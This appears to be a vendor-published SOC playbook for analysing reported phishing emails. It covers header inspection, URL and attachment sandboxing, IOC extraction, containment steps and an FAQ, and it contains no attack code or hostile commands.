Overview
Phishing remains the most common initial access vector for cyber attacks, and every reported phishing email is an intelligence opportunity. This playbook provides step-by-step procedures for analyzing reported phishing emails, from header inspection through payload analysis and IOC extraction. Follow it consistently and you will turn user reports into actionable intelligence that improves your defenses.
Analysis Workflow
- Receive the reported email and preserve the original with full headers
- Analyze email headers to identify the true sending infrastructure
- Inspect URLs without clicking: use sandbox or URL expansion tools
- Check sender reputation against threat intelligence and blocklists
- Analyze any attachments in a sandboxed environment
- Extract IOCs: sender domains, IPs, URLs, file hashes, email subjects
- Determine the intent: credential harvesting, malware delivery, BEC, or reconnaissance
- Check if other users received the same or similar emails
- Take containment actions: block domains, quarantine matching emails, reset credentials if needed
- Document findings and close the ticket
Header Analysis Fields
| Header field | What to check | Red flags |
|---|---|---|
| Return-Path | Actual reply destination | Mismatch with From address |
| Received | Mail server path and originating IP | Suspicious or unknown mail relays |
| Authentication-Results | SPF, DKIM, DMARC pass/fail | Failures on supposedly legitimate senders |
| X-Originating-IP | True source IP of the sender | IP from known malicious ranges, VPN, or hosting providers |
| Reply-To | Where replies are directed | Different domain from the From address |
| Message-ID | Unique identifier for the email | Message-ID domain does not match sender domain |
URL and Link Analysis
Never click links directly. Copy the URL and analyze it in a sandboxed tool like URLScan, VirusTotal, or your SOAR platform. Look for domain spoofing techniques like typosquatting, homoglyph attacks, and subdomain abuse. Check when the domain was registered because newly created domains are a strong phishing indicator. Inspect URL shorteners by expanding them before analysis. Compare the visible text of the link with the actual href destination and flag mismatches. Pay attention to redirects that chain through multiple domains before reaching the final landing page.
Attachment Analysis
- Submit attachments to a malware sandbox for behavioral analysis before opening them
- Check file hashes against threat intelligence databases and VirusTotal
- Analyze file metadata for suspicious properties: authorship, creation tools, hidden macros
- For Office documents, check for embedded macros, OLE objects, and external template references
- For PDFs, inspect for embedded JavaScript, launch actions, and suspicious form fields
- For archive files (ZIP, RAR, 7z), check for password protection (often noted in the email body) and nested payloads
Containment and Response
Once you confirm a phishing email is malicious, move fast. Search your email platform for all instances of the same email by subject line, sender, or unique body content. Quarantine or purge matching messages from all mailboxes. Block the sender domain and any malicious URLs at the email gateway and web proxy. If any user clicked a link or opened an attachment, treat it as a potential compromise: reset their credentials, scan their endpoint, and check for post-exploitation activity. Report the IOCs to your threat intelligence platform so future emails from the same campaign are caught automatically.
Frequently Asked Questions
How should users report suspected phishing emails?
Provide a one-click "Report Phishing" button integrated into the email client. This forwards the original email with full headers directly to the SOC mailbox. Avoid telling users to forward emails manually since they often lose header information.
What tools are essential for phishing analysis?
An email header analyzer, URL sandbox (URLScan.io), file sandbox (Any.Run, Joe Sandbox), threat intelligence feeds (VirusTotal, AbuseIPDB), and your SOAR platform for automated enrichment and response actions.
How do we handle user credentials submitted to a phishing site?
Immediately reset the compromised credentials and force re-enrollment of MFA. Check for any access from suspicious IPs since the submission. Review email forwarding rules that may have been set during the compromise. Notify the user and provide guidance.
Should we respond to every reported phishing email?
Yes. Even if a reported email is legitimate, acknowledge the user is report and thank them for their vigilance. This reinforces the reporting culture. Automate initial analysis where possible to handle high report volumes efficiently.
How do we track phishing campaign trends?
Maintain a phishing log that tracks sender domains, payload types, targeting patterns, and outcomes. Review trends monthly to identify campaigns targeting your organization and adjust email security controls accordingly.
Ready to use this resource?
Download it now or schedule a demo to see how Hunto AI can automate your security workflows.